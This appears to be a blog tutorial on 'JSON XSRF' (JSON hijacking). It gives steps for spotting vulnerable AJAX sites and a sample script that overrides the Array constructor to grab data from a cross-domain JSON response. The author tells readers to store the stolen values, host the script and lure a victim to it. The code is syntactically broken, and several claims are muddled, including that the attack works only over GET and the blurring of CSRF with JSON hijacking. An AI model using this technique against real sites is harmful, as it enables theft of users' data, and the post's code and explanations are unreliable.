In our last post on JSON XSRF attacks we
saw some basics about XSRF attacks. So now in this section we will have
our look on how to find and exploit JSON vulnerability for attack. As
told in previous post JSON vulnerability exists when JSON data transfer
format is used instead of standard XML data transfer format and that
happens only in AJAX based web applications so following are your steps
to find out whether a site is vulnerable or not.
- If the web application is running on AJAX then check for response type of application for JSON format or Java Script.
- Now determine whether a cross domain request can be made from it or not. If yes, check for transferred parameters, if they are same for each request or they are predictable then web application is vulnerable
Now a point of importance, JSON attacks
can only be performed using HTTP GET method, that means if the
application uses POST instead of GET then you have to check does it also
supports GET method or not else you can't perform an attack.
Now its time to understand how to
attack. A site vulnerable to XSRF attacks can only be exploited using
Java Script. Now suppose after determining vulnerability you found that
web application has 4 parameters out of which nearly all are either same
or predictable. Then basically you can exploit web application using
code which may appear as following,
<script>
function display (s)
{
alert(s);
}
function Array ()
{
for (var i=0 ; i<4 ; i++)
this[i] grab = display;
}
</script>
<script src= “http://example.com/someNavigation/data.json”></script>
For above example data is coming in JSON
format from example{dot}com. As found earlier there are 4 parameters so
we constructed an array object in which we defined variable grab to
capture 4 parameters and send it to display function. Display function
will just display the grabbed parameters. Note that this is just an
example script the original code may vary depending upon the web
application. Rather than displaying grabbed parameters you can also opt
to write them somewhere for further reference. Now upload this script to
your site and vector it your victim.
This post might be little tricky to
understand for those who don't have any kinda experience in AJAX and
Java Script but I hope most of you might understand it since I tried to
keep it as simple as I can. So in next post to JSON XSRF attacks we will
see its preventive measures till then thanks for reading, have nice
time and keep visiting.
0 comments:
Post a Comment